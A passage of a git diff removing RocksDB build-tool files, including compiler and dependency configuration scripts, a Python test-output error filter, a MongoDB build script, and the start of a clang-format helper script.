-GCC_BASE=/mnt/gvfs/third-party2/gcc/2928bb3ed95bf64f5b388ee88c30dc74710c3b35/5.x/centos6-native/f4950a1
-CLANG_BASE=/mnt/gvfs/third-party2/llvm-fb/a5fea028cb7ba43498976e1f8054b0b2e790c295/stable/centos6-native/6aaf4de
-LIBGCC_BASE=/mnt/gvfs/third-party2/libgcc/7a9099f6587ee4378c0b1fa32bb8934019d30ca4/5.x/gcc-5-glibc-2.23/339d858
-GLIBC_BASE=/mnt/gvfs/third-party2/glibc/3b7c6469854dfc7832a1c3cc5b86919a84e5f865/2.23/gcc-5-glibc-2.23/ca1d1c0
-SNAPPY_BASE=/mnt/gvfs/third-party2/snappy/8c38a4c1e52b4c2cc8a9cdc31b9c947ed7dbfcb4/1.1.3/gcc-5-glibc-2.23/9bc6787
-ZLIB_BASE=/mnt/gvfs/third-party2/zlib/d7861abe6f0e27ab98c9303b95a662f0e4cdedb5/1.2.8/gcc-5-glibc-2.23/9bc6787
-BZIP2_BASE=/mnt/gvfs/third-party2/bzip2/740325875f6729f42d28deaa2147b0854f3a347e/1.0.6/gcc-5-glibc-2.23/9bc6787
-LZ4_BASE=/mnt/gvfs/third-party2/lz4/0815d59804160c96caac5f27ca004f51af893dc6/r131/gcc-5-glibc-2.23/9bc6787
-ZSTD_BASE=/mnt/gvfs/third-party2/zstd/c15a4f5f619a2930478d01e2e34dc1e0652b0873/1.1.4/gcc-5-glibc-2.23/03859b5
-GFLAGS_BASE=/mnt/gvfs/third-party2/gflags/f905a5e1032fb30c05db3d3752319857388c0c49/2.2.0/gcc-5-glibc-2.23/9bc6787
-JEMALLOC_BASE=/mnt/gvfs/third-party2/jemalloc/8d60633d822a2a55849c73db24e74a25e52b71db/master/gcc-5-glibc-2.23/1c32b4b
-NUMA_BASE=/mnt/gvfs/third-party2/numa/17c514c4d102a25ca15f4558be564eeed76f4b6a/2.0.8/gcc-5-glibc-2.23/9bc6787
-LIBUNWIND_BASE=/mnt/gvfs/third-party2/libunwind/8db74270cd6d0212ac92d69e7fc7beefe617d772/trunk/gcc-5-glibc-2.23/b1847cb
-TBB_BASE=/mnt/gvfs/third-party2/tbb/9d9a554877d0c5bef330fe818ab7178806dd316a/4.0_update2/gcc-5-glibc-2.23/9bc6787
-KERNEL_HEADERS_BASE=/mnt/gvfs/third-party2/kernel-headers/90c9734afc5579c9d1db529fa788d09f97763b85/4.0.9-36_fbk5_2933_gd092e3f/gcc-5-glibc-2.23/da39a3e
-BINUTILS_BASE=/mnt/gvfs/third-party2/binutils/9e829389ef61b92c62de8748c80169aaf25ce1f0/2.26.1/centos6-native/da39a3e
-VALGRIND_BASE=/mnt/gvfs/third-party2/valgrind/d7f4d4d86674a57668e3a96f76f0e17dd0eb8765/3.11.0/gcc-5-glibc-2.23/9bc6787
-LUA_BASE=/mnt/gvfs/third-party2/lua/61e4abf5813bbc39bc4f548757ccfcadde175a48/5.2.3/gcc-5-glibc-2.23/65372bd
diff --git a/thirdparty/rocksdb/build_tools/dependencies_4.8.1.sh b/thirdparty/rocksdb/build_tools/dependencies_4.8.1.sh
deleted file mode 100644
index ef0cda2..0000000
--- a/thirdparty/rocksdb/build_tools/dependencies_4.8.1.sh
+++ /dev/null
@@ -1,18 +0,0 @@
-GCC_BASE=/mnt/gvfs/third-party2/gcc/cf7d14c625ce30bae1a4661c2319c5a283e4dd22/4.8.1/centos6-native/cc6c9dc
-CLANG_BASE=/mnt/gvfs/third-party2/llvm-fb/8598c375b0e94e1448182eb3df034704144a838d/stable/centos6-native/3f16ddd
-LIBGCC_BASE=/mnt/gvfs/third-party2/libgcc/d6e0a7da6faba45f5e5b1638f9edd7afc2f34e7d/4.8.1/gcc-4.8.1-glibc-2.17/8aac7fc
-GLIBC_BASE=/mnt/gvfs/third-party2/glibc/d282e6e8f3d20f4e40a516834847bdc038e07973/2.17/gcc-4.8.1-glibc-2.17/99df8fc
-SNAPPY_BASE=/mnt/gvfs/third-party2/snappy/8c38a4c1e52b4c2cc8a9cdc31b9c947ed7dbfcb4/1.1.3/gcc-4.8.1-glibc-2.17/c3f970a
-ZLIB_BASE=/mnt/gvfs/third-party2/zlib/0882df3713c7a84f15abe368dc004581f20b39d7/1.2.8/gcc-4.8.1-glibc-2.17/c3f970a
-BZIP2_BASE=/mnt/gvfs/third-party2/bzip2/740325875f6729f42d28deaa2147b0854f3a347e/1.0.6/gcc-4.8.1-glibc-2.17/c3f970a
-LZ4_BASE=/mnt/gvfs/third-party2/lz4/0e790b441e2d9acd68d51e1d2e028f88c6a79ddf/r131/gcc-4.8.1-glibc-2.17/c3f970a
-ZSTD_BASE=/mnt/gvfs/third-party2/zstd/9455f75ff7f4831dc9fda02a6a0f8c68922fad8f/1.0.0/gcc-4.8.1-glibc-2.17/c3f970a
-GFLAGS_BASE=/mnt/gvfs/third-party2/gflags/f001a51b2854957676d07306ef3abf67186b5c8b/2.1.1/gcc-4.8.1-glibc-2.17/c3f970a
-JEMALLOC_BASE=/mnt/gvfs/third-party2/jemalloc/fc8a13ca1fffa4d0765c716c5a0b49f0c107518f/master/gcc-4.8.1-glibc-2.17/8d31e51
-NUMA_BASE=/mnt/gvfs/third-party2/numa/17c514c4d102a25ca15f4558be564eeed76f4b6a/2.0.8/gcc-4.8.1-glibc-2.17/c3f970a
-LIBUNWIND_BASE=/mnt/gvfs/third-party2/libunwind/ad576de2a1ea560c4d3434304f0fc4e079bede42/trunk/gcc-4.8.1-glibc-2.17/675d945
-TBB_BASE=/mnt/gvfs/third-party2/tbb/9d9a554877d0c5bef330fe818ab7178806dd316a/4.0_update2/gcc-4.8.1-glibc-2.17/c3f970a
-KERNEL_HEADERS_BASE=/mnt/gvfs/third-party2/kernel-headers/7c111ff27e0c466235163f00f280a9d617c3d2ec/4.0.9-36_fbk5_2933_gd092e3f/gcc-4.8.1-glibc-2.17/da39a3e
-BINUTILS_BASE=/mnt/gvfs/third-party2/binutils/b7fd454c4b10c6a81015d4524ed06cdeab558490/2.26/centos6-native/da39a3e
-VALGRIND_BASE=/mnt/gvfs/third-party2/valgrind/d7f4d4d86674a57668e3a96f76f0e17dd0eb8765/3.8.1/gcc-4.8.1-glibc-2.17/c3f970a
-LUA_BASE=/mnt/gvfs/third-party2/lua/61e4abf5813bbc39bc4f548757ccfcadde175a48/5.2.3/centos6-native/730f94e
diff --git a/thirdparty/rocksdb/build_tools/dockerbuild.sh b/thirdparty/rocksdb/build_tools/dockerbuild.sh
deleted file mode 100755
index 02f6094..0000000
--- a/thirdparty/rocksdb/build_tools/dockerbuild.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/usr/bin/env bash
-docker run -v $PWD:/rocks -w /rocks buildpack-deps make
diff --git a/thirdparty/rocksdb/build_tools/error_filter.py b/thirdparty/rocksdb/build_tools/error_filter.py
deleted file mode 100644
index 9f619cf..0000000
--- a/thirdparty/rocksdb/build_tools/error_filter.py
+++ /dev/null
@@ -1,167 +0,0 @@
-#  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-#  This source code is licensed under both the GPLv2 (found in the
-#  COPYING file in the root directory) and Apache 2.0 License
-#  (found in the LICENSE.Apache file in the root directory).
-
-'''Filter for error messages in test output:
-    - Receives merged stdout/stderr from test on stdin
-    - Finds patterns of known error messages for test name (first argument)
-    - Prints those error messages to stdout
-'''
-
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-
-import re
-import sys
-
-
-class ErrorParserBase(object):
-    def parse_error(self, line):
-        '''Parses a line of test output. If it contains an error, returns a
-        formatted message describing the error; otherwise, returns None.
-        Subclasses must override this method.
-        '''
-        raise NotImplementedError
-
-
-class GTestErrorParser(ErrorParserBase):
-    '''A parser that remembers the last test that began running so it can print
-    that test's name upon detecting failure.
-    '''
-    _GTEST_NAME_PATTERN = re.compile(r'\[ RUN      \] (\S+)$')
-    # format: '<filename or "unknown file">:<line #>: Failure'
-    _GTEST_FAIL_PATTERN = re.compile(r'(unknown file|\S+:\d+): Failure$')
-
-    def __init__(self):
-        self._last_gtest_name = 'Unknown test'
-
-    def parse_error(self, line):
-        gtest_name_match = self._GTEST_NAME_PATTERN.match(line)
-        if gtest_name_match:
-            self._last_gtest_name = gtest_name_match.group(1)
-            return None
-        gtest_fail_match = self._GTEST_FAIL_PATTERN.match(line)
-        if gtest_fail_match:
-            return '%s failed: %s' % (
-                    self._last_gtest_name, gtest_fail_match.group(1))
-        return None
-
-
-class MatchErrorParser(ErrorParserBase):
-    '''A simple parser that returns the whole line if it matches the pattern.
-    '''
-    def __init__(self, pattern):
-        self._pattern = re.compile(pattern)
-
-    def parse_error(self, line):
-        if self._pattern.match(line):
-            return line
-        return None
-
-
-class CompilerErrorParser(MatchErrorParser):
-    def __init__(self):
-        # format: '<filename>:<line #>:<column #>: error: <error msg>'
-        super(CompilerErrorParser, self).__init__(r'\S+:\d+:\d+: error:')
-
-
-class ScanBuildErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(ScanBuildErrorParser, self).__init__(
-                r'scan-build: \d+ bugs found.$')
-
-
-class DbCrashErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(DbCrashErrorParser, self).__init__(r'\*\*\*.*\^$|TEST FAILED.')
-
-
-class WriteStressErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(WriteStressErrorParser, self).__init__(
-                r'ERROR: write_stress died with exitcode=\d+')
-
-
-class AsanErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(AsanErrorParser, self).__init__(
-                r'==\d+==ERROR: AddressSanitizer:')
-
-
-class UbsanErrorParser(MatchErrorParser):
-    def __init__(self):
-        # format: '<filename>:<line #>:<column #>: runtime error: <error msg>'
-        super(UbsanErrorParser, self).__init__(r'\S+:\d+:\d+: runtime error:')
-
-
-class ValgrindErrorParser(MatchErrorParser):
-    def __init__(self):
-        # just grab the summary, valgrind doesn't clearly distinguish errors
-        # from other log messages.
-        super(ValgrindErrorParser, self).__init__(r'==\d+== ERROR SUMMARY:')
-
-
-class CompatErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(CompatErrorParser, self).__init__(r'==== .*[Ee]rror.* ====$')
-
-
-class TsanErrorParser(MatchErrorParser):
-    def __init__(self):
-        super(TsanErrorParser, self).__init__(r'WARNING: ThreadSanitizer:')
-
-
-_TEST_NAME_TO_PARSERS = {
-    'punit': [CompilerErrorParser, GTestErrorParser],
-    'unit': [CompilerErrorParser, GTestErrorParser],
-    'release': [CompilerErrorParser, GTestErrorParser],
-    'unit_481': [CompilerErrorParser, GTestErrorParser],
-    'release_481': [CompilerErrorParser, GTestErrorParser],
-    'clang_unit': [CompilerErrorParser, GTestErrorParser],
-    'clang_release': [CompilerErrorParser, GTestErrorParser],
-    'clang_analyze': [CompilerErrorParser, ScanBuildErrorParser],
-    'code_cov': [CompilerErrorParser, GTestErrorParser],
-    'unity': [CompilerErrorParser, GTestErrorParser],
-    'lite': [CompilerErrorParser],
-    'lite_test': [CompilerErrorParser, GTestErrorParser],
-    'stress_crash': [CompilerErrorParser, DbCrashErrorParser],
-    'write_stress': [CompilerErrorParser, WriteStressErrorParser],
-    'asan': [CompilerErrorParser, GTestErrorParser, AsanErrorParser],
-    'asan_crash': [CompilerErrorParser, AsanErrorParser, DbCrashErrorParser],
-    'ubsan': [CompilerErrorParser, GTestErrorParser, UbsanErrorParser],
-    'ubsan_crash': [CompilerErrorParser, UbsanErrorParser, DbCrashErrorParser],
-    'valgrind': [CompilerErrorParser, GTestErrorParser, ValgrindErrorParser],
-    'tsan': [CompilerErrorParser, GTestErrorParser, TsanErrorParser],
-    'format_compatible': [CompilerErrorParser, CompatErrorParser],
-    'run_format_compatible': [CompilerErrorParser, CompatErrorParser],
-    'no_compression': [CompilerErrorParser, GTestErrorParser],
-    'run_no_compression': [CompilerErrorParser, GTestErrorParser],
-    'regression': [CompilerErrorParser],
-    'run_regression': [CompilerErrorParser],
-}
-
-
-def main():
-    if len(sys.argv) != 2:
-        return 'Usage: %s <test name>' % sys.argv[0]
-    test_name = sys.argv[1]
-    if test_name not in _TEST_NAME_TO_PARSERS:
-        return 'Unknown test name: %s' % test_name
-
-    error_parsers = []
-    for parser_cls in _TEST_NAME_TO_PARSERS[test_name]:
-        error_parsers.append(parser_cls())
-
-    for line in sys.stdin:
-        line = line.strip()
-        for error_parser in error_parsers:
-            error_msg = error_parser.parse_error(line)
-            if error_msg is not None:
-                print(error_msg)
-
-
-if __name__ == '__main__':
-    sys.exit(main())
diff --git a/thirdparty/rocksdb/build_tools/fb_compile_mongo.sh b/thirdparty/rocksdb/build_tools/fb_compile_mongo.sh
deleted file mode 100755
index c087f81..0000000
--- a/thirdparty/rocksdb/build_tools/fb_compile_mongo.sh
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/bin/sh
-
-# fail early
-set -e
-
-if test -z $ROCKSDB_PATH; then
-  ROCKSDB_PATH=~/rocksdb
-fi
-source $ROCKSDB_PATH/build_tools/fbcode_config4.8.1.sh
-
-EXTRA_LDFLAGS=""
-
-if test -z $ALLOC; then
-  # default
-  ALLOC=tcmalloc
-elif [[ $ALLOC == "jemalloc" ]]; then
-  ALLOC=system
-  EXTRA_LDFLAGS+=" -Wl,--whole-archive $JEMALLOC_LIB -Wl,--no-whole-archive"
-fi
-
-# we need to force mongo to use static library, not shared
-STATIC_LIB_DEP_DIR='build/static_library_dependencies'
-test -d $STATIC_LIB_DEP_DIR || mkdir $STATIC_LIB_DEP_DIR
-test -h $STATIC_LIB_DEP_DIR/`basename $SNAPPY_LIBS` || ln -s $SNAPPY_LIBS $STATIC_LIB_DEP_DIR
-test -h $STATIC_LIB_DEP_DIR/`basename $LZ4_LIBS` || ln -s $LZ4_LIBS $STATIC_LIB_DEP_DIR
-
-EXTRA_LDFLAGS+=" -L $STATIC_LIB_DEP_DIR"
-
-set -x
-
-EXTRA_CMD=""
-if ! test -e version.json; then
-  # this is Mongo 3.0
-  EXTRA_CMD="--rocksdb \
-    --variant-dir=linux2/norm
-    --cxx=${CXX} \
-    --cc=${CC} \
-    --use-system-zlib"  # add this line back to normal code path
-                        # when https://jira.mongodb.org/browse/SERVER-19123 is resolved
-fi
-
-scons \
-  LINKFLAGS="$EXTRA_LDFLAGS $EXEC_LDFLAGS $PLATFORM_LDFLAGS" \
-  CCFLAGS="$CXXFLAGS -L $STATIC_LIB_DEP_DIR" \
-  LIBS="lz4 gcc stdc++" \
-  LIBPATH="$ROCKSDB_PATH" \
-  CPPPATH="$ROCKSDB_PATH/include" \
-  -j32 \
-  --allocator=$ALLOC \
-  --nostrip \
-  --opt=on \
-  --disable-minimum-compiler-version-enforcement \
-  --use-system-snappy \
-  --disable-warnings-as-errors \
-  $EXTRA_CMD $*
diff --git a/thirdparty/rocksdb/build_tools/fbcode_config.sh b/thirdparty/rocksdb/build_tools/fbcode_config.sh
deleted file mode 100644
index b8609a1..0000000
--- a/thirdparty/rocksdb/build_tools/fbcode_config.sh
+++ /dev/null
@@ -1,156 +0,0 @@
-#!/bin/sh
-#
-# Set environment variables so that we can compile rocksdb using
-# fbcode settings.  It uses the latest g++ and clang compilers and also
-# uses jemalloc
-# Environment variables that change the behavior of this script:
-# PIC_BUILD -- if true, it will only take pic versions of libraries from fbcode. libraries that don't have pic variant will not be included
-
-
-BASEDIR=`dirname $BASH_SOURCE`
-source "$BASEDIR/dependencies.sh"
-
-CFLAGS=""
-
-# libgcc
-LIBGCC_INCLUDE="$LIBGCC_BASE/include"
-LIBGCC_LIBS=" -L $LIBGCC_BASE/lib"
-
-# glibc
-GLIBC_INCLUDE="$GLIBC_BASE/include"
-GLIBC_LIBS=" -L $GLIBC_BASE/lib"
-
-# snappy
-SNAPPY_INCLUDE=" -I $SNAPPY_BASE/include/"
-if test -z $PIC_BUILD; then
-  SNAPPY_LIBS=" $SNAPPY_BASE/lib/libsnappy.a"
-else
-  SNAPPY_LIBS=" $SNAPPY_BASE/lib/libsnappy_pic.a"
-fi
-CFLAGS+=" -DSNAPPY"
-
-if test -z $PIC_BUILD; then
-  # location of zlib headers and libraries
-  ZLIB_INCLUDE=" -I $ZLIB_BASE/include/"
-  ZLIB_LIBS=" $ZLIB_BASE/lib/libz.a"
-  CFLAGS+=" -DZLIB"
-
-  # location of bzip headers and libraries
-  BZIP_INCLUDE=" -I $BZIP2_BASE/include/"
-  BZIP_LIBS=" $BZIP2_BASE/lib/libbz2.a"
-  CFLAGS+=" -DBZIP2"
-
-  LZ4_INCLUDE=" -I $LZ4_BASE/include/"
-  LZ4_LIBS=" $LZ4_BASE/lib/liblz4.a"
-  CFLAGS+=" -DLZ4"
-
-  ZSTD_INCLUDE=" -I $ZSTD_BASE/include/"
-  ZSTD_LIBS=" $ZSTD_BASE/lib/libzstd.a"
-  CFLAGS+=" -DZSTD"
-fi
-
-# location of gflags headers and libraries
-GFLAGS_INCLUDE=" -I $GFLAGS_BASE/include/"
-if test -z $PIC_BUILD; then
-  GFLAGS_LIBS=" $GFLAGS_BASE/lib/libgflags.a"
-else
-  GFLAGS_LIBS=" $GFLAGS_BASE/lib/libgflags_pic.a"
-fi
-CFLAGS+=" -DGFLAGS=gflags"
-
-# location of jemalloc
-JEMALLOC_INCLUDE=" -I $JEMALLOC_BASE/include/"
-JEMALLOC_LIB=" $JEMALLOC_BASE/lib/libjemalloc.a"
-
-if test -z $PIC_BUILD; then
-  # location of numa
-  NUMA_INCLUDE=" -I $NUMA_BASE/include/"
-  NUMA_LIB=" $NUMA_BASE/lib/libnuma.a"
-  CFLAGS+=" -DNUMA"
-
-  # location of libunwind
-  LIBUNWIND="$LIBUNWIND_BASE/lib/libunwind.a"
-fi
-
-# location of TBB
-TBB_INCLUDE=" -isystem $TBB_BASE/include/"
-if test -z $PIC_BUILD; then
-  TBB_LIBS="$TBB_BASE/lib/libtbb.a"
-else
-  TBB_LIBS="$TBB_BASE/lib/libtbb_pic.a"
-fi
-CFLAGS+=" -DTBB"
-
-# use Intel SSE support for checksum calculations
-export USE_SSE=1
-
-BINUTILS="$BINUTILS_BASE/bin"
-AR="$BINUTILS/ar"
-
-DEPS_INCLUDE="$SNAPPY_INCLUDE $ZLIB_INCLUDE $BZIP_INCLUDE $LZ4_INCLUDE $ZSTD_INCLUDE $GFLAGS_INCLUDE $NUMA_INCLUDE $TBB_INCLUDE"
-
-STDLIBS="-L $GCC_BASE/lib64"
-
-CLANG_BIN="$CLANG_BASE/bin"
-CLANG_LIB="$CLANG_BASE/lib"
-CLANG_SRC="$CLANG_BASE/../../src"
-
-CLANG_ANALYZER="$CLANG_BIN/clang++"
-CLANG_SCAN_BUILD="$CLANG_SRC/llvm/tools/clang/tools/scan-build/bin/scan-build"
-
-if [ -z "$USE_CLANG" ]; then
-  # gcc
-  CC="$GCC_BASE/bin/gcc"
-  CXX="$GCC_BASE/bin/g++"
-
-  CFLAGS+=" -B$BINUTILS/gold"
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  JEMALLOC=1
-else
-  # clang
-  CLANG_INCLUDE="$CLANG_LIB/clang/stable/include"
-  CC="$CLANG_BIN/clang"
-  CXX="$CLANG_BIN/clang++"
-
-  KERNEL_HEADERS_INCLUDE="$KERNEL_HEADERS_BASE/include"
-
-  CFLAGS+=" -B$BINUTILS/gold -nostdinc -nostdlib"
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/5.x "
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/5.x/x86_64-facebook-linux "
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  CFLAGS+=" -isystem $CLANG_INCLUDE"
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE/linux "
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE "
-  CFLAGS+=" -Wno-expansion-to-defined "
-  CXXFLAGS="-nostdinc++"
-fi
-
-CFLAGS+=" $DEPS_INCLUDE"
-CFLAGS+=" -DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX -DROCKSDB_FALLOCATE_PRESENT -DROCKSDB_MALLOC_USABLE_SIZE -DROCKSDB_RANGESYNC_PRESENT -DROCKSDB_SCHED_GETCPU_PRESENT -DROCKSDB_SUPPORT_THREAD_LOCAL -DHAVE_SSE42"
-CXXFLAGS+=" $CFLAGS"
-
-EXEC_LDFLAGS=" $SNAPPY_LIBS $ZLIB_LIBS $BZIP_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS $NUMA_LIB $TBB_LIBS"
-EXEC_LDFLAGS+=" -B$BINUTILS/gold"
-EXEC_LDFLAGS+=" -Wl,--dynamic-linker,/usr/local/fbcode/gcc-5-glibc-2.23/lib/ld.so"
-EXEC_LDFLAGS+=" $LIBUNWIND"
-EXEC_LDFLAGS+=" -Wl,-rpath=/usr/local/fbcode/gcc-5-glibc-2.23/lib"
-# required by libtbb
-EXEC_LDFLAGS+=" -ldl"
-
-PLATFORM_LDFLAGS="$LIBGCC_LIBS $GLIBC_LIBS $STDLIBS -lgcc -lstdc++"
-
-EXEC_LDFLAGS_SHARED="$SNAPPY_LIBS $ZLIB_LIBS $BZIP_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS $TBB_LIBS"
-
-VALGRIND_VER="$VALGRIND_BASE/bin/"
-
-LUA_PATH="$LUA_BASE"
-
-if test -z $PIC_BUILD; then
-  LUA_LIB=" $LUA_PATH/lib/liblua.a"
-else
-  LUA_LIB=" $LUA_PATH/lib/liblua_pic.a"
-fi
-
-export CC CXX AR CFLAGS CXXFLAGS EXEC_LDFLAGS EXEC_LDFLAGS_SHARED VALGRIND_VER JEMALLOC_LIB JEMALLOC_INCLUDE CLANG_ANALYZER CLANG_SCAN_BUILD LUA_PATH LUA_LIB
diff --git a/thirdparty/rocksdb/build_tools/fbcode_config4.8.1.sh b/thirdparty/rocksdb/build_tools/fbcode_config4.8.1.sh
deleted file mode 100644
index f5b8334..0000000
--- a/thirdparty/rocksdb/build_tools/fbcode_config4.8.1.sh
+++ /dev/null
@@ -1,115 +0,0 @@
-#!/bin/sh
-#
-# Set environment variables so that we can compile rocksdb using
-# fbcode settings.  It uses the latest g++ compiler and also
-# uses jemalloc
-
-BASEDIR=`dirname $BASH_SOURCE`
-source "$BASEDIR/dependencies_4.8.1.sh"
-
-# location of libgcc
-LIBGCC_INCLUDE="$LIBGCC_BASE/include"
-LIBGCC_LIBS=" -L $LIBGCC_BASE/lib"
-
-# location of glibc
-GLIBC_INCLUDE="$GLIBC_BASE/include"
-GLIBC_LIBS=" -L $GLIBC_BASE/lib"
-
-# location of snappy headers and libraries
-SNAPPY_INCLUDE=" -I $SNAPPY_BASE/include"
-SNAPPY_LIBS=" $SNAPPY_BASE/lib/libsnappy.a"
-
-# location of zlib headers and libraries
-ZLIB_INCLUDE=" -I $ZLIB_BASE/include"
-ZLIB_LIBS=" $ZLIB_BASE/lib/libz.a"
-
-# location of bzip headers and libraries
-BZIP2_INCLUDE=" -I $BZIP2_BASE/include/"
-BZIP2_LIBS=" $BZIP2_BASE/lib/libbz2.a"
-
-LZ4_INCLUDE=" -I $LZ4_BASE/include"
-LZ4_LIBS=" $LZ4_BASE/lib/liblz4.a"
-
-ZSTD_INCLUDE=" -I $ZSTD_BASE/include"
-ZSTD_LIBS=" $ZSTD_BASE/lib/libzstd.a"
-
-# location of gflags headers and libraries
-GFLAGS_INCLUDE=" -I $GFLAGS_BASE/include/"
-GFLAGS_LIBS=" $GFLAGS_BASE/lib/libgflags.a"
-
-# location of jemalloc
-JEMALLOC_INCLUDE=" -I $JEMALLOC_BASE/include"
-JEMALLOC_LIB="$JEMALLOC_BASE/lib/libjemalloc.a"
-
-# location of numa
-NUMA_INCLUDE=" -I $NUMA_BASE/include/"
-NUMA_LIB=" $NUMA_BASE/lib/libnuma.a"
-
-# location of libunwind
-LIBUNWIND="$LIBUNWIND_BASE/lib/libunwind.a"
-
-# location of tbb
-TBB_INCLUDE=" -isystem $TBB_BASE/include/"
-TBB_LIBS="$TBB_BASE/lib/libtbb.a"
-
-# use Intel SSE support for checksum calculations
-export USE_SSE=1
-
-BINUTILS="$BINUTILS_BASE/bin"
-AR="$BINUTILS/ar"
-
-DEPS_INCLUDE="$SNAPPY_INCLUDE $ZLIB_INCLUDE $BZIP2_INCLUDE $LZ4_INCLUDE $ZSTD_INCLUDE $GFLAGS_INCLUDE $NUMA_INCLUDE $TBB_INCLUDE"
-
-STDLIBS="-L $GCC_BASE/lib64"
-
-if [ -z "$USE_CLANG" ]; then
-  # gcc
-  CC="$GCC_BASE/bin/gcc"
-  CXX="$GCC_BASE/bin/g++"
-
-  CFLAGS="-B$BINUTILS/gold -m64 -mtune=generic"
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  JEMALLOC=1
-else
-  # clang
-  CLANG_BIN="$CLANG_BASE/bin"
-  CLANG_LIB="$CLANG_BASE/lib"
-  CLANG_INCLUDE="$CLANG_LIB/clang/*/include"
-  CC="$CLANG_BIN/clang"
-  CXX="$CLANG_BIN/clang++"
-
-  KERNEL_HEADERS_INCLUDE="$KERNEL_HEADERS_BASE/include/"
-
-  CFLAGS="-B$BINUTILS/gold -nostdinc -nostdlib"
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/4.8.1 "
-  CFLAGS+=" -isystem $LIBGCC_BASE/include/c++/4.8.1/x86_64-facebook-linux "
-  CFLAGS+=" -isystem $GLIBC_INCLUDE"
-  CFLAGS+=" -isystem $LIBGCC_INCLUDE"
-  CFLAGS+=" -isystem $CLANG_INCLUDE"
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE/linux "
-  CFLAGS+=" -isystem $KERNEL_HEADERS_INCLUDE "
-  CXXFLAGS="-nostdinc++"
-fi
-
-CFLAGS+=" $DEPS_INCLUDE"
-CFLAGS+=" -DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX -DROCKSDB_FALLOCATE_PRESENT -DROCKSDB_MALLOC_USABLE_SIZE -DROCKSDB_RANGESYNC_PRESENT -DROCKSDB_SCHED_GETCPU_PRESENT -DROCKSDB_SUPPORT_THREAD_LOCAL -DHAVE_SSE42"
-CFLAGS+=" -DSNAPPY -DGFLAGS=google -DZLIB -DBZIP2 -DLZ4 -DZSTD -DNUMA -DTBB"
-CXXFLAGS+=" $CFLAGS"
-
-EXEC_LDFLAGS=" $SNAPPY_LIBS $ZLIB_LIBS $BZIP2_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS $NUMA_LIB $TBB_LIBS"
-EXEC_LDFLAGS+=" -Wl,--dynamic-linker,/usr/local/fbcode/gcc-4.8.1-glibc-2.17/lib/ld.so"
-EXEC_LDFLAGS+=" $LIBUNWIND"
-EXEC_LDFLAGS+=" -Wl,-rpath=/usr/local/fbcode/gcc-4.8.1-glibc-2.17/lib"
-# required by libtbb
-EXEC_LDFLAGS+=" -ldl"
-
-PLATFORM_LDFLAGS="$LIBGCC_LIBS $GLIBC_LIBS $STDLIBS -lgcc -lstdc++"
-
-EXEC_LDFLAGS_SHARED="$SNAPPY_LIBS $ZLIB_LIBS $BZIP2_LIBS $LZ4_LIBS $ZSTD_LIBS $GFLAGS_LIBS"
-
-VALGRIND_VER="$VALGRIND_BASE/bin/"
-
-LUA_PATH="$LUA_BASE"
-
-export CC CXX AR CFLAGS CXXFLAGS EXEC_LDFLAGS EXEC_LDFLAGS_SHARED VALGRIND_VER JEMALLOC_LIB JEMALLOC_INCLUDE LUA_PATH
diff --git a/thirdparty/rocksdb/build_tools/format-diff.sh b/thirdparty/rocksdb/build_tools/format-diff.sh
deleted file mode 100755
index 81221ed..0000000
--- a/thirdparty/rocksdb/build_tools/format-diff.sh
+++ /dev/null
@@ -1,122 +0,0 @@
-#!/usr/bin/env bash
-# If clang_format_diff.py command is not specfied, we assume we are able to
-# access directly without any path.
-if [ -z $CLANG_FORMAT_DIFF ]
-then
-CLANG_FORMAT_DIFF="clang-format-diff.py"
-fi
-
-# Check clang-format-diff.py
-if ! which $CLANG_FORMAT_DIFF &> /dev/null
-then
-  echo "You didn't have clang-format-diff.py and/or clang-format available in your computer!"
-  echo "You can download clang-format-diff.py by running: "
-  echo "    curl --location http://goo.gl/iUW1u2 -o ${CLANG_FORMAT_DIFF}"
-  echo "You can download clang-format by running: "
-  echo "    brew install clang-format"
-  echo "Then, move both files (i.e. ${CLANG_FORMAT_DIFF} and clang-format) to some directory within PATH=${PATH}"
-  exit 128
-fi
-
-# Check argparse, a library that clang-format-diff.py requires.
-python 2>/dev/null << EOF
-import argparse
-EOF
-
-if [ "$?" != 0 ]
-then
-  echo "To run clang-format-diff.py, we'll need the library "argparse" to be"
-  echo "installed. You can try either of the follow ways to install it:"
-  echo "  1. Manually download argparse: https://pypi.python.org/pypi/argparse"
-  echo "  2. easy_install argparse (if you have easy_install)"
-  echo "  3. pip install argparse (if you have pip)"
-  exit 129
-fi
-
-# TODO(kailiu) following work is not complete since we still need to figure
-# out how to add the modified files done pre-commit hook to git's commit index.
-#
-# Check if this script has already been added to pre-commit hook.
-# Will suggest user to add this script to pre-commit hook if their pre-commit
-# is empty.
-# PRE_COMMIT_SCRIPT_PATH="`git rev-parse --show-toplevel`/.git/hooks/pre-commit"
-# if ! ls $PRE_COMMIT_SCRIPT_PATH &> /dev/null
-# then
-#   echo "Would you like to add this script to pre-commit hook, which will do "
-#   echo -n "the format check for all the affected lines before you check in (y/n):"
-#   read add_to_hook
-#   if [ "$add_to_hook" == "y" ]
-#   then
